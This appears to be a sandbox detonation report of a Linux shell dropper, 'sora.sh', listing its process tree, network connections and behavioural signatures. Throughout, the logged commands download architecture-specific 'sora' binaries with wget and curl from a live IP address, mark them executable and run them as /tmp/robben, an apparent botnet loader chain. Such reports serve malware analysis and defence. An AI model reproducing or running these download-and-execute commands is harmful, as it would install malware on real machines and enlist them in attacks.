[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.m68k]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.sh4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-29 20:35
Reported
2024-08-29 20:38
Platform
debian9-mipsel-20240611-en
Max time kernel
35s
Max time network
36s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mips]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i468]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i686]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm5]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm6]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm7]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.m68k]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.sh4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp |